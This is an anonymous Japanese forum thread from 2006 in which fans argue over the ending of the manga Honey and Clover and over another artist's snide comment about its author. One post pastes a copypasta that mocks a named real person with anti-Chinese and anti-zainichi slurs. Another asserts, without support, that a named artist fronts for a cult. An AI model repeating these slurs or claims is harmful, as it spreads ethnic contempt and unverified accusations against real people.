クリエイターならわかってくれるみたいに閉じないでさ

363 :花と名無しさん:2006/09/22(金) 07:19:21 ID:???0
っつか、いくら怪我した時点で
芸術家さんにとっては死ぬほどたいへんなのかな、と
同情してみても
最終回でほとんど治ってるような描き方だから
がっかりなわけで・・

364 :花と名無しさん:2006/09/22(金) 07:40:09 ID:???0
>356
ぼるじょあ? 確かこんなの。 >(・3・)

でもこれだとヲタじゃなくてちゃねらか。

365 :花と名無しさん:2006/09/22(金) 09:07:11 ID:???0
竹本って、六太郎くらいに精神年齢退化しちゃったな・・・

366 :花と名無しさん:2006/09/22(金) 09:16:32 ID:???0
どーせ金も才能もありませんよ!

→不幸自慢禁止

367 :花と名無しさん:2006/09/22(金) 09:31:40 ID:???0
          ●● 竹本の不幸 ●●
・小学生の頃父が他界。高校で母が再婚するが、自分の進む道がわからなくなる。
 この頃からすでに彼の自分探しは始まっていた。探さない方がいいのに。
・浜美入学早々森田に中学生みたいな髪型にされ一年間振り回される。
・天才はぐに一目惚れし、己の平凡さを嘆き将来に不安を覚える。ここから真の不幸が始まる。
・今日なんで集まったんだっけ?「ぼくの誕生日ですよ」しかもツイスターゲーム。
・はぐの部屋に泊まる事になるが、夜中にベルサイユのキッチンセットを作ってと言い残しはぐ就寝。
 ただの奴隷扱いだがこれはまだ幸せだったかもしれない。むしろ絶頂期。
・森田がはぐを好きだと気付き、勝ち目が無いと悟りぼんやりする。
・夜、電話一本でクリスマスなのにバルーンアートを徹夜で作る手伝いにかりだされる。不眠でバイトへ。
・暖をとりたいという理由だけで寝袋の上から針金で巻かれて森田に一晩軟禁され、更に起床した真山に叱られる。
・「はぐは森田となかよしだったりするのかい?」「先生…ぼくに聞かないでください」
・就職に失敗し続け学園祭用の謎の塔を一心不乱に作り続ける。この頃から鬱病気味に。
・錯乱した山田のかかと落としが直撃。
・「いるべき人が いなくって いなくても どってことない人間が ここでケーキを口に運んでいる」
 クリスマスケーキを食べながら超ネガティブ思考。そしてまたツイスターゲーム。
・卒業制作の作業中に吐血>入院>浪人。
・内定が決まった日に、就職先がどうやら倒産しそうだという報せが就職祝い中に届く。
・幻聴が聴こえてくる。気付いたら自転車で海に着き、そのままママチャリであてもなく日本列島を北上。痔になる。
・旅先で住み込みバイト中に、年下の元ヤンから「おまえ」「ばかじゃねーの」等の罵声を浴びる。
・一皮むけて旅から帰ってきてフラれる。
・リハビリを手伝う為に就職をやめる>収入不足の為バイト増加>リハビリが疎かに>妄想の中でさえはぐと一緒になれない。
・飛び越えようと思った窓枠に足がぶつかりゴミの山に頭から落ちる。しかもそれがすごく似合っている。
・雑草サンドに男泣き。

368 :花と名無しさん:2006/09/22(金) 09:32:26 ID:???0
       ●● 番外編 ●●
・職場に女っ気が全く無いので棟梁のおごりで六太郎と一緒にソープで童貞を捨てる。(予想1)
・職場に女っ気が全く無いので実はそっち系だったしんさんに優しくされ、徐々に心を開いていき掘られる。(予想2)
・アニメの竹本の声を当ててくれた声優が交通事故で最終回を目前に降板。(現実)

369 :花と名無しさん:2006/09/22(金) 09:38:46 ID:???0
クリエーターにわかってほしいって作者が言ってた
はぐの辛さって、好きな人との恋愛より芸術を選んだってことも入ってるの?

370 :花と名無しさん:2006/09/22(金) 10:51:19 ID:???0
>>369
そうじゃね

371 :花と名無しさん:2006/09/22(金) 11:12:35 ID:???0
それを辛さって言われてももっと努力すれば
恋も芸術も得られたんじゃないかって思ってしまう描かれ方だったから
あまり可哀相だと思えなかった
一人で頑張ってるエピソードとか入れてくれたら良かったのに
困った事態になるとすぐに他者に頼って解決って他力本願なんだもん

372 :花と名無しさん:2006/09/22(金) 12:04:19 ID:???0
そもそも修がはぐから精神的に離れられないじゃない。
モンゴルに行ったら泣いたり病気になったりして大変だった

373 :花と名無しさん:2006/09/22(金) 12:24:46 ID:???0
あれはギャグでしょう
本人はモンゴルの兄妹見て自分がいつかはぐから離れる覚悟をしてた

あの当時は修はぐENDは考えてなかったんだろうな

374 :花と名無しさん :2006/09/22(金) 12:55:39 ID:Ihxzp0cu0
秋本先生!連載30周年おめでとうございます。生き馬の目を抜くようなジャ
ンプでよくもまあ30年も……凄いです!!両さんはいったい幾つなんでしょう
ね。『セーラームーン』と『幽☆遊☆白書』の結婚式でお目にかかった時、
あまりの腰の低さにびっくりしました。羽海野チカは "米搗きバッタ" をや
り過ぎて首がおかしくなったことがあるそうです。気をつけてくださいね。

これマジなの?
漫画界のあらゆる人が寄稿してお祝いしてる中で
こんな陰険で陰湿ないやみ言って大丈夫なのか?
皆普通にえ…?て気分悪くなるじゃん。どうしちゃったのこの人。

これがめぞん一刻みたいな漫画ならたけのこエンドだったのに…
叩かれてたからそうとうアレなのかと思ったが単行本で読んだらそうでもなかった。

375 :花と名無しさん:2006/09/22(金) 13:20:44 ID:???0
まぁだから、要するに一条ゆかりっておばさんには
ウミノさんの事が米搗きバッタに見えて、それが気に入らなかったって事じゃないの。
こち亀なんてどうでもいいって思ってて注目される場なのわかってて言いたかったんだろうな。

すごい根性してるなとは思うがやっぱ頭おかしいよな。

376 :花と名無しさん:2006/09/22(金) 13:21:40 ID:???0
辛さっつーかクリエイターのエゴというか業かね。
油絵は細密画を描いてる人は手首から先も命だね。
はぐはそういう画風でもないけど、途中まではそれなりに描けても
仕上げの段階に入ると難しいと思う。魂そそぎこむ勢いで描いてる人は
なおさら思うようにならなくてもどかしいだろうな

377 :花と名無しさん :2006/09/22(金) 13:30:40 ID:???0
酒井まゆといい一条ゆかりといい少女漫画界はこええ…

378 :花と名無しさん:2006/09/22(金) 13:37:25 ID:???0
どんな業界でもうるさいババアはいるよ

379 :花と名無しさん:2006/09/22(金) 13:43:22 ID:???0
台湾でドラマ化しないかな(・∀・)

380 :花と名無しさん:2006/09/22(金) 13:45:27 ID:???0
修のはぐに対する感情が変わった境目っていつだろう

381 :花と名無しさん:2006/09/22(金) 13:52:55 ID:???0
>>380 はぐが森田を好きだって知ったくだりからだったりして・・・

382 :花と名無しさん:2006/09/22(金) 14:08:51 ID:???0
こち亀はもう何年も前からジャンプでも打ち切り関係ない
特殊枠にいるのバレバレだし、
しかも秋本本人はもうとっくに漫画描いてないし
未だに自分で取材に行って描いてる御大からしてみたら
微妙に腹立つ&どうでもいい存在だろうて。

それよりもウミノのほうがよっぽど目障りだったんだろうねw

383 :花と名無しさん:2006/09/22(金) 14:15:24 ID:???0
それが事実だとしても公共の場するものとして御大のコメントが空気読めてないことに変わりはないね

384 :花と名無しさん:2006/09/22(金) 14:20:08 ID:???0
つーかあのジャンプで特別枠まで得られること自体がすごいんだと思うが。

ウミノを批判するのは自由だけどそこで批判されたら
秋本氏に迷惑だって判断すらできなくなってる一条さんは本当に痛いな。
ウミノさんとはまた違う痛さ炸裂させてる感じ。
テレビでも雑誌でも露出する度に痛さを曝け出してる部分は似てるんだけどさ。
少女漫画家ってやっぱり普通の人より社会性に欠けるようになっちゃうのかな。

385 :花と名無しさん :2006/09/22(金) 14:52:17 ID:???0
いきなり全然関係のない少女漫画家の名をだして、凄い面子が集ってる中
羽海野チカは "米搗きバッタ" をや
り過ぎて首がおかしくなったことがあるそうです。気をつけてくださいね。って
とんでもないイヤミだな・・・

そんなに卑屈?な態度がカンに触ったんだろうか
にしても怖い。まともじゃない。
スラダンの井上も寄稿してたから見ただろうな…

386 :花と名無しさん:2006/09/22(金) 15:08:25 ID:???0
そのコメントで
「『セーラームーン』と『幽☆遊☆白書』の結婚」なんて
イヤミっぽく書かれた武内直子と一条ゆかりは
一緒に旅行行くくらい仲良しだよ。

一条ゆかりがそうやって人前で悪口言うのは
「仲良しなのよーーー」というアピールだったりするのさ。
だから、「米つきバッタ」なんて書かれた羽海野さんも
一条ゆかりと「仲良しなのよー」アピールなのかもしれないのさ。

あと、一条ゆかりが常識なくて空気が読めない女なのは本当。
韓国ドラマに心酔したり、韓国系カルト宗教の摂理の広告塔を
やるような女なんだから。

>少女漫画家ってやっぱり普通の人より社会性に欠ける

いやー、一条ゆかりが特別酷いんじゃないかな。

387 :花と名無しさん:2006/09/22(金) 15:23:51 ID:???0
イエッフー☆ヘイヘイバチコーイ★

388 :花と名無しさん:2006/09/22(金) 15:43:26 ID:???0
キヨシローが喉頭癌に!って現実のニュースだと、よりによって咽かよ!って気の毒になるけど、
創作物の中で、画家が手を怪我したと言われても。
火の鳥鳳凰編の我王という偉大な先人がいるわけだし。

389 :花と名無しさん:2006/09/22(金) 15:45:36 ID:???0
あの怪我、1年もかからずに回復してそうなんだけど
それでも修ちゃんは一生を捧げちゃうのかなぁ。

390 :花と名無しさん:2006/09/22(金) 16:03:57 ID:???0
>>389
はぐは元々ケガする前から修に創作活動のサポートをしてほしいと
思ってたじゃん。
でもそれは修の人生をくれと言うようなものだから遠慮して言えずに
いた。そして修ははぐの気持ちに気づいててサポート役をやりたいと
思っていた。
ケガをして自分にとって芸術は一番大切なものと思い知ったはぐは
修の人生をもらう(ある意味背負う?)覚悟を決めたってことなんじゃないの

391 :花と名無しさん:2006/09/22(金) 16:07:11 ID:???0
ビジネスパートナーじゃいかんのでしょうか…

392 :花と名無しさん:2006/09/22(金) 16:16:41 ID:???0
>>391
基本的にビジネスパートナーなんじゃないの?
修には恋愛感情があるしはぐもまんざらでもなさそうだから将来的に
恋人関係になったり夫婦になったりするかもしれないけど。

今回の「人生ください」は創作活動に戻れるようにするためと、その後
創作活動に必要なサポートを一生ヨロシクってことだと思って読んでた。



393 :花と名無しさん:2006/09/22(金) 16:33:25 ID:???O
修の恋愛感情に気付いていながら、人生ください。
しかし修に、森田に対する気持ちを隠さないはぐってどうよ?

394 :花と名無しさん:2006/09/22(金) 16:38:12 ID:???0
所詮はぐにとって修ちゃんはホイップちゃんベルチョ(ry

395 :花と名無しさん:2006/09/22(金) 16:49:12 ID:???0
580 :ひよこ名無しさん :2006/09/22(金) 00:31:31 0

     愛知県警「こんなもんかよ」
     愛知県警「うわさの中国人ってのは―――」
     愛知県警「こんなもんかよッッ」
    竹石圭佑「ヒィ……」
     愛知県警「逃がすかバカッッ」
    竹石圭佑「……救命阿ッッ」

588 :ひよこ名無しさん :2006/09/22(金) 00:53:41 0

         ★竹石圭佑の名言集☆

 蒲田署「…………… な… な… なにものだ………」
竹石圭佑「とっくに ごぞんじなんだろ!? オレは名古屋から
     きさまらをたおすためにやってきた 中国人……… 
     わずかな理性をもちながら はげしい性欲によって目覚めた 伝説の戦士…超中国人 竹石圭佑だ!!!!!」

竹石圭佑「植草の敵を討つんだ!!!あいつは二度捕まった!!!もう言い逃れできない!!!」

竹石圭佑「植草はいいヤツだった…ホントにいいヤツだった…一番の仲間…
     つ…捕まえやがって………」

 蒲田署「あのミラーマンのように!!!!」
竹石圭佑「あのミラーマンのように?…
     植草のことか… 植草のことかーーーーっ!!!!!」

竹石圭佑「ざ い に ち 波ーーーーーっ!!!!!」

396 :花と名無しさん:2006/09/22(金) 16:53:08 ID:???0
友達に同人マンガ描いてる人いるけどすごく売れてて妹がマネージャーみたいな
ことしてる。昔一緒に同人やってた仲間はいつのまにかアシスタントになってる。
もちろん妹には給料を払ってるしアシスタントにもお金を出してる。
イベント後の打ち上げ費用とかも全部払ってる。(時々私も便乗するw)

ようするに何が言いたいのかというと作家でもスポーツ選手でも芸術家でも
才能があってそれで金を稼げる(←これ需要)人間の周りには自然と人が
集まるもんなんだよ。
もちろんお金の問題だけじゃなく自分もかじってるからこそ身近に自分とは
かけ離れた才能を持ってる人間がいれば尊敬したりその人の作品の手伝い
が出来ることを幸せに思ったりもする。
もちろんそこに至るまでに葛藤はあるものの、なによりそうやって身近で
サポートする人間ってたいていその作家なり選手の一番のファンで誰よりも
期待してたりするもんなんだよね。
修もはぐの作品の一番のファンなんじゃないかな。


397 :花と名無しさん:2006/09/22(金) 16:56:54 ID:???0
でも、はぐのまわりにはたくさんの人は集まらないよねぇー。


398 :花と名無しさん:2006/09/22(金) 16:58:03 ID:???0

臭が顔を赤らめながら「好きさ!大好きさ!」と言ったことや
「先生も男だったんですねぇー」と言われて臭が照れてたことは
なかったことになってるのかな。

399 :花と名無しさん:2006/09/22(金) 17:16:10 ID:???0
>>398
ん?なんで?
修がはぐのサポートにつくのは恋愛感情のみでないとダメなのか?

それ以前にはぐの才能が重要なんじゃね。
別に女として好きなだけなら普通に仕事しながら結婚すればいいだけで
仕事なげうってまではぐに一生捧げる必要はないよ。

400 :花と名無しさん:2006/09/22(金) 18:21:27 ID:???0
人生ささげるくらいはぐの才能にも惚れてるってことでしょ。
家事とかも修がやるんかな…

>>396
才能は確かに人集まるよね。その代わりおかしい人が寄ってきたり
根岸のおっちゃんみたいな人も出てくるんだけどね…。
はぐも注目されているから、この先他にもいい理解者が出てくる可能性はありそう。




401 :花と名無しさん:2006/09/22(金) 18:23:42 ID:???0
>>399
>>396のように一番のファンとして寄り添うだけでいいものを、
一生かけて添い遂げるように描いてしまったのはウミノさんだからねぇ。
その時点では、修にそういう部分を求めて描いたのではないかと解釈したよ。
その後読者に無償の行為だとわからせる為、自転車のシーンで竹本に語らせた。
男にそれだけのものを求めてるんだろうね。女性の為に自己犠牲を厭わない男を。

402 :花と名無しさん:2006/09/22(金) 18:44:24 ID:???0
才能があってそれで稼げる人間のまわりには人が集まってくるってのは
きっとウミノさん自身が実感してるところだろうね。

弟が野球のスポーツ特待で某強豪校に進学した時の両親や親戚や近所の
オヤジらの熱狂ぶりを思い出したよ。
食えといっては肉や魚をもってきてくれたり膝が痛いといえば
「あの先生がいい」「この先生がいいと」と大騒ぎだった。
今は普通に工場で働いてるけどね。

403 :花と名無しさん:2006/09/22(金) 18:49:39 ID:???0
自分語りうざい。

404 :花と名無しさん:2006/09/22(金) 18:58:50 ID:???0
まあそれだけ才能のある奴が身近にいると周囲もなんらかの影響を受けるってことだな


405 :花と名無しさん:2006/09/22(金) 19:04:16 ID:???0
>>357
同意。
ちょっとでもいいから、はぐが入院中にキャンバスとかクロッキーとかにチャレンジして欲しかった。
「(ケガした右手でも左手でも)思うように全然描けない……なんで…?(涙)」という風に
驚愕&苦悩しているところが欲しかった。
それを見て、「とりあえず今は治すことを考えよう」と言う臭が欲しかった。

そうすれば、はぐが治らなかったらどうしよう、と死ぬほど悩むのもありだし、
仕事を休んででも付き添おう、と決意する臭の気持ちが分かりやすくなったと思うyo……

406 :花と名無しさん:2006/09/22(金) 19:06:58 ID:???0
10巻にはいってる読み切りのマンガ読むと作者は家事がキライなのかなと思った。
ヒマな時はいいけど仕事が忙しいときまで当たり前にやらされるのはまっぴらゴメンみたいな・・・・・。
はぐも部屋キレイだったし普段は家事もやりそうだけど創作に没頭しだしたらほかの事は何もしなさそう。

407 :花と名無しさん:2006/09/22(金) 19:22:18 ID:???0
>>406
その為の「人生ください」

408 :花と名無しさん:2006/09/22(金) 19:23:41 ID:???0
>>404

そして誰にも影響をあたえなかった竹本

409 :花と名無しさん:2006/09/22(金) 19:38:26 ID:???0
普通の人ってそんなもん

410 :花と名無しさん:2006/09/22(金) 19:43:31 ID:???0
はぐの才能が、例え自分が望む望まないに関らず
美術世界がはぐを離さない、才能はもはや一人のものではない
というような、背負っている物が本当に大きいという具体的なエピソードが後半にもほしかった。
そうしたら森田と離れるときもっと切なかったかも。

411 :花と名無しさん:2006/09/22(金) 19:45:31 ID:pkjzuuFr0
>>408
ハチクロ自体が『竹本君成長日記』みたいな感じだから、
影響されるばっかりでも、しょうがなくない?

412 :花と名無しさん:2006/09/22(金) 20:02:16 ID:???0
たけのこは初めから最後まで輪から外れてた
かわいそうな子なんだよ…

413 :花と名無しさん:2006/09/22(金) 20:05:26 ID:???0
ハチクロって
何も考えずに「よかったー」「かんどうしたー」「なけたー」と
ひたってたのしめるしあわせなひとたちと
ハチクロの説明不足な部分を愛情を持って
自分らで補いながら読める人達じゃないと
楽しめないんだなぁ…。

414 :花と名無しさん:2006/09/22(金) 20:18:13 ID:???O
たけもっちゃんにも新たな恋の予感みたいなのを
感じさせて終わってくれたらなあ
どっかの娘さんが昼休みに差し入れ持ってきて
あらいいですね的な

415 :花と名無しさん:2006/09/22(金) 21:28:26 ID:???0
いいおサセがやってきた

416 :花と名無しさん:2006/09/22(金) 21:56:04 ID:???0
>>410
そこまではぐの才能マンセーだったら逆にウザイし返せるか返せないかわからないけど描きたいってのが薄まるかと


417 :花と名無しさん:2006/09/22(金) 21:56:58 ID:???0
>>413
>説明不足な部分を愛情を持って
>自分らで補いながら読める人達=同人、二次創作描き手

418 :花と名無しさん:2006/09/22(金) 22:10:07 ID:???0
はぐは修の他にも、誰か見つけそうな気がする

旦那さんと、才能を刺激し合う同士(男)と両方持ってる女性がいたけど
はぐもそういう風になろうと思えばなれるんじゃないか

419 :花と名無しさん:2006/09/22(金) 22:34:17 ID:???0
>>418
修がビジネスパートナーだというなら
はぐが芸術面で成長するにしたがって
もっと条件のいい人が出てきそうだよね。
(芸術的な刺激を受ける存在とか、金銭的な部分とか・・・)
精神面や家事・生活一般とかそういう部分では修に頼るんだろうけど。

420 :花と名無しさん:2006/09/22(金) 22:36:17 ID:???0
>>413
終わったマンガについてこんなとこで熱く語ってるオマイも
十分ハチクロを楽しんでる勝ち組

421 :花と名無しさん:2006/09/22(金) 23:10:48 ID:???0
>>419
現実にもそれで相手を乗換えたり増やしたりする人もいるよね。
ずっと糟糠の妻と連れ添う人もいるけど

422 :花と名無しさん:2006/09/22(金) 23:17:00 ID:???0
>>421
絵描きはよく知らないけど音楽家だとビジネスパートナーの他に
パトロンがつきものだよね。
はぐは相手を乗り換えたり増やしたりってタイプには見えないけど。

423 :花と名無しさん:2006/09/22(金) 23:18:47 ID:???0
とりあえず
ナレーターの竹本くんに合掌

424 :花と名無しさん:2006/09/22(金) 23:26:41 ID:???0
>>423
驚かせるなよ〜
死んだのかと思ってググッちゃったよ

425 :花と名無しさん:2006/09/22(金) 23:28:14 ID:???O
ウミノが大好きな宮崎パヤオの作品にだって、
怪我が原因じゃないけど魔法が使えなくなって悩んで復活するまでを段階を踏んで描いているよ。
はぐの場合は唐突に怪我→右手あぼんの危機→好きさ大好きさ→最終回

426 :花と名無しさん:2006/09/22(金) 23:30:54 ID:???O
>>401
ローマイヤ・竹本義父・徳大寺・山田父とかそんな感じだもんね…

427 :花と名無しさん:2006/09/22(金) 23:34:35 ID:???O
>421
ミスチルとかグレイとかマイナーな例は小西康陽とか

428 :花と名無しさん:2006/09/22(金) 23:35:58 ID:???O
>401
現実になかなかいないから漫画に憧れが強く出るのでは

429 :花と名無しさん:2006/09/22(金) 23:42:42 ID:???0
>はぐの場合は唐突に怪我→右手あぼんの危機→好きさ大好きさ→最終回
わかりやすうい

430 :花と名無しさん:2006/09/22(金) 23:55:08 ID:???0
なんだか今日はアンチ意見のレベルが低いな・・・・
同感も反論もする気がおきん
まともなアンチはもう消えたのか?

431 :花と名無しさん:2006/09/22(金) 23:59:21 ID:???0
夜釣りの成果はどうですか?430

432 :花と名無しさん:2006/09/22(金) 23:59:43 ID:???0
>>430
誘導。
あんたと意見が合うレベルの高いアンチもきっといるんじゃないか?↓

ハチミツとクローバーアンチスレ
http://comic6.2ch.net/test/read.cgi/csaloon/1146626902/

433 :花と名無しさん:2006/09/23(土) 00:30:26 ID:???O
>>430
まともなアンチの定義がわからないw

434 :花と名無しさん:2006/09/23(土) 00:48:22 ID:???O
もうええやん☆
ウミノ先生も次回作はきっと万人を納得させられる大ハッピーエンドを描いてくれるよ☆


うう、酔った…ォェ

435 :花と名無しさん:2006/09/23(土) 00:55:08 ID:???0
森田って美大は中退したのかな? 仲間は誰もいなくなって行ってもつまらないだろうし

436 :花と名無しさん:2006/09/23(土) 01:05:26 ID:???O
山田は就職決まったんだっけ?ラストにそういうエピソードあった?

437 :花と名無しさん:2006/09/23(土) 01:31:42 ID:???0
そこでスピンオフですよ

438 :花と名無しさん:2006/09/23(土) 01:38:44 ID:???0
山田も大きな仕事やらしてもらってるしベタ誉めされまくりだし、将来的には大物になるんでないの

439 :花と名無しさん:2006/09/23(土) 01:45:37 ID:???O
>>437
うーん。本来なら最終回で、山田の就職が決まったり、はぐがリハビリしながら作った鳩の話が出たりしてまとめるんじゃないのかね。

その後を詳しく描くのがスピンオフなんでは。


なんかなーやっぱりすべてにおいて、ごっこっぽい・似非・嘘クサい・偽善的なかんじがするんだよな

440 :花と名無しさん:2006/09/23(土) 01:50:06 ID:???O
意外とキャラに対して情がないね

441 :花と名無しさん:2006/09/23(土) 01:56:28 ID:???O
367:花と名無しさん :2006/09/17(日) 17:39:37 ID:???0 [sage]
「はちみつとクローバー」の作者に
連載開始早々位の時期にペーパー希望の封書おくったけど、
未だにこない上に同人やめてるしー
そんなものかと諦めてるけど。
二・三ヶ月遅れても来るならまだいいんじゃない?

442 :花と名無しさん:2006/09/23(土) 02:05:32 ID:???0
山田も就職できなかった割には天才キャラだよね
真の意味での凡人は竹本だけか

443 :花と名無しさん:2006/09/23(土) 02:12:58 ID:???0
真の意味での凡人・・・・竹本

444 :花と名無しさん:2006/09/23(土) 02:14:02 ID:???O
竹本君は思いやりがある良い子だよ。才能なくたって、それがあればいいぢゃん。竹本君は自転車の旅で強くなったし、それでいいんでない?!

445 :花と名無しさん:2006/09/23(土) 02:15:53 ID:???0
てか陶芸家ってきまった就職先あるものなの?
陶芸やめて他の仕事するならあれだけど


446 :花と名無しさん:2006/09/23(土) 02:21:11 ID:???O
陶芸で食ってける人なんて一部でしょ?!あゆは、実家が酒屋ってことで幸せなのでは? 副業で好きな陶芸ができるわけだから

447 :花と名無しさん:2006/09/23(土) 02:29:25 ID:???0
山田って未だに大学の釜つかってるんだよね。
今後も陶芸続けてくなら自分の釜もったりするのかな

448 :花と名無しさん:2006/09/23(土) 02:35:55 ID:???O
どーなんやろ あゆがどれだけ陶芸に思いがあるかによると思うんだけど・・ 釜つくるって結構な金がかかりそうやね

449 :花と名無しさん:2006/09/23(土) 02:39:18 ID:???O
あゆもリカも、美貌も才能もある非凡な人間だよね
森田やはぐも

でも読者は竹本に共感する人が多いんじゃない?森田父の友達のヒトとか
その竹本の扱いがアレなのはちょっとね

持つ者と持たざる者の描き方がよかったと感じたのは、バナナフィッシュのアッシュと英二だな


450 :花と名無しさん:2006/09/23(土) 02:39:39 ID:???0
山田の釜は野宮に設計してもらって竹本に作ってもらいといいよ



451 :花と名無しさん:2006/09/23(土) 02:44:06 ID:???O
あゆと野宮サンが うまく行くまでみたかった!あゆは、真山のこと忘れられるのか?!

452 :花と名無しさん:2006/09/23(土) 02:51:29 ID:???O
竹本(凡人)と森田(天才)の喧嘩をギャグで濁したまま終わったのがなんかなぁ・・・

最終回のラストで脳内ポエムでみんなを思い出と美化する前に行動しようよ竹本

このまんがって、肝心なとこでポエムって濁しちゃって、実際に現実的に考えて行動することって少ない印象

453 :花と名無しさん:2006/09/23(土) 02:54:10 ID:???O
確かに肝心な所は詞になってるな〜でも、逆にそれがいいかもな 現実、思ったことを行動に移すことのが少ないわけやし・ある意味リアルなんちゃう?!

454 :花と名無しさん:2006/09/23(土) 02:54:13 ID:VuZoD6M6O
>>451
真山を忘れられない私ごと全部愛して☆受け止めて☆

真山=森田・私=はぐに変換してもおk

455 :花と名無しさん:2006/09/23(土) 03:00:24 ID:???O
野宮サンは あゆのことそうやって思ってるかもだけど、あゆがな〜 なんで真山のことを思い出として 収められないんだ?!

456 :花と名無しさん:2006/09/23(土) 03:03:22 ID:???O
>>455

想い続けることが、想いが深いことだと作者が思ってるんじゃない!

457 :花と名無しさん:2006/09/23(土) 03:09:07 ID:???O
想い続けることは、大事だ!でも、それが重荷になって、前に進めないのでは、意味がない。しかも、今、野宮が近くにいて、気持ちがあるのなら、過去の自分陶酔に浸るのもいい加減にしなければ!

458 :花と名無しさん:2006/09/23(土) 03:36:27 ID:???0
>>449
あの漫画は持てる者が持たざる者をひたすらマンセーする凡人万歳漫画だったけど
こっちは持てる者が持たざる者を干からびるまで吸い尽くす天才万歳漫画だからなぁ
どっちも極端といえば極端だ

459 :花と名無しさん:2006/09/23(土) 04:05:34 ID:???0
>>456
最後のあゆのネバひきには心底ウンザリしたけどあれは完全にもう気持ちは野宮
に行ってるよな
はぐもそうだけど「二人とも好きなの!」みたいのが好きなのかな?
でも実際は男よりは女のほうが新しい相手みつかったら切り替え速そうだがな

460 :花と名無しさん:2006/09/23(土) 04:22:56 ID:???O
>>459
あれはもう、何ていうか、真山を好きじゃなくなる自分がイヤなだけくさい
拘ってるだけできもちはないとオモ

461 :花と名無しさん:2006/09/23(土) 04:36:48 ID:???O
>>458
英二マンセーはハチ子マンセーに似てる。


462 :花と名無しさん:2006/09/23(土) 05:31:50 ID:???O
山田はいずれ森田とくっつく…そう思ってた時期が俺にもありました。
いい雰囲気になってたシーンが何回かあったと思ったんだが思い込みだったか…

たぶん一番の理由は野宮が気に入らなかったからだろうけど。

463 :花と名無しさん:2006/09/23(土) 06:32:27 ID:???0
山田が森田に落ち葉を散らしてお礼を言うシーンが優しくて切なくて印象的。
いい雰囲気だった。それでハチクロに嵌ったから少し期待してたんだけどな。

464 :花と名無しさん:2006/09/23(土) 06:54:28 ID:???0
野宮と山田は結構典型的な少女漫画っぽいんだけどね
主人公が片想いの相手に振られてよりスペックの高い男がちょっかいかけてくるなんて
かなり都合のいいシンデレラストーリーだよ
これが山田主人公なら真山も実は山田が好きって展開になるんだろうけど
さすがにそれはなかった
森田の役所は同性の親友ポジ
はぐは飼ってるリスザル

465 :花と名無しさん:2006/09/23(土) 06:57:26 ID:???0
竹本は近所の浪人生あたりか

466 :花と名無しさん:2006/09/23(土) 07:31:08 ID:???O
>>465
ベンゾーさんか!

467 :花と名無しさん:2006/09/23(土) 07:33:59 ID:???0
山田と森田は、
お互いを恋愛対象外として見てる故の仲良さでしょ。

安心して恋愛感情の挟まない友情をはぐくめた、
て感じ。






リアルに考えると嘘くさいけどねw

468 :花と名無しさん:2006/09/23(土) 07:40:40 ID:???0
兄と妹って感じかな
男はどうだか知らないけど
女はそういう風に恋愛感情一切排除した対象として男の人を見ることはできるよね

469 :花と名無しさん:2006/09/23(土) 08:48:26 ID:???0
ていうかはぐが恋愛より芸術を選んだとして
それで話の流れがはぐのその選択を美化しまくるのが気持ち悪かった。
だってはぐの選択は作者の選択で、それって結局自画自賛なんだよな。
単に、竹本と一緒に歩むキャパ・森田を慰めてやるだけのキャパがなくて
修に頼って甘え甘えさせつづけるだけの未熟児をよ?
礼賛礼賛って、そりゃ気持ち悪かった。

470 :花と名無しさん:2006/09/23(土) 09:05:24 ID:P4CCBWbl0
竹本より凡人だった修ちゃん

471 :花と名無しさん:2006/09/23(土) 09:48:25 ID:???O
森田は山田の恋をどう思ってたんだろうか?
二人きりにして山田に感謝されたり、あきらめるよう諭したり何がしたいんだよ。

472 :花と名無しさん:2006/09/23(土) 10:02:49 ID:mupv2Syc0
>>420
時が過ぎて 
世間的に思い出になる日がきっと来る―――でも
僕がいて 君がいて みんながいて 
ハチクロについて語る この奇跡のような日々は 
いつまでも甘い想いと共に
ネットの中の 
  2chという場所でずっと
飽きられもせず続けられるんだ





473 :花と名無しさん:2006/09/23(土) 11:55:06 ID:tKjGiqB50
こんなに深読みしなきゃならないものはいやだ
もっとフツーに納得、読めるものがいい

10巻読みきりのドラえもんの道具を使うというテーマ作品(もう手放したからタイトルわからない)
前半がスターウォーズで後半が11人いる!だったから驚いた

474 :花と名無しさん:2006/09/23(土) 12:33:24 ID:???0
>>471
どうもしたくないんじゃないか
山田の気の済むようにしてやりたかっただけだと思う
ただ森田は真山の気持ちも知ってるわけだから色々複雑だったんだろう

475 :花と名無しさん:2006/09/23(土) 13:04:34 ID:???0
出てくる人みんな、恋愛に関してその場限りの慰めとアドバイスしかしないよね。
ほんとに雰囲気だけなんだよな・・

476 :花と名無しさん:2006/09/23(土) 13:13:29 ID:???0
でも現実でも不倫とかしてる友人にやめとけって言っても
それで納得してやめる人っていないし
恋愛なんて本人が納得するまでやるしかないんじゃないか
特に相手に恋人がいるとか他に好きな人がいるという負け戦の場合は

477 :花と名無しさん:2006/09/23(土) 13:21:44 ID:???0
>>475
実際恋愛のアドバイスなんて現実でもそんなもんじゃない?
他人が口出ししたところで本人の気持ちは決まってるもんだしさ
できるのはせいぜいその場限りの慰めとちょっとしたアドバイスくらいだよ


478 :花と名無しさん:2006/09/23(土) 13:27:42 ID:???0
あの話かわるけど、作者のブログ、本当に普段からああいう喋り方なのかな。
よ?☆
みたいな語調が痛々しい・・・。
しかも、天然臭はしないんだよな。

479 :花と名無しさん:2006/09/23(土) 13:55:05 ID:???O
>>469
ほんとにね〜
気持ち悪かった

480 :花と名無しさん:2006/09/23(土) 14:06:30 ID:???O
>>476>>477

友達が山田みたくグダグダひきずって愚痴りまくってきた時は、さすがに怒ったけどなー。
盲目になりすぎて周りが見えなくなっていたら、友達ならちゃんと指摘するもんではないのかなー。



481 :花と名無しさん:2006/09/23(土) 14:21:03 ID:???0
>>480
同意ー。
その場の雰囲気でなぐさめるだけなら
あまり親しくない友達でもできるもんね。

482 :花と名無しさん:2006/09/23(土) 14:23:28 ID:???0
女はなにも成長しなくて良くて
男ばっかり反省して諦めて、従順に尽くして・・・

483 :花と名無しさん:2006/09/23(土) 14:25:03 ID:???0
引きずるのは勝手だけど、山田は周りを巻き込むからイヤ。

484 :花と名無しさん:2006/09/23(土) 14:47:43 ID:???0
>>480
森田は山田甘やかす傾向あったからなー
そこら辺厳しく言えるのは同性の友達じゃない?
ただはぐにそんなこと言えるわけもないし
山田の友達はいつのまにかフェードアウトしてたから誰も注意しないで
最後までgdgdになったという感じ

485 :花と名無しさん:2006/09/23(土) 14:51:03 ID:???0
森田、山田には厳しく言ってやるべきだといって
屋上から突き落とそうとしてたやん

486 :花と名無しさん:2006/09/23(土) 14:59:12 ID:???0
>>480
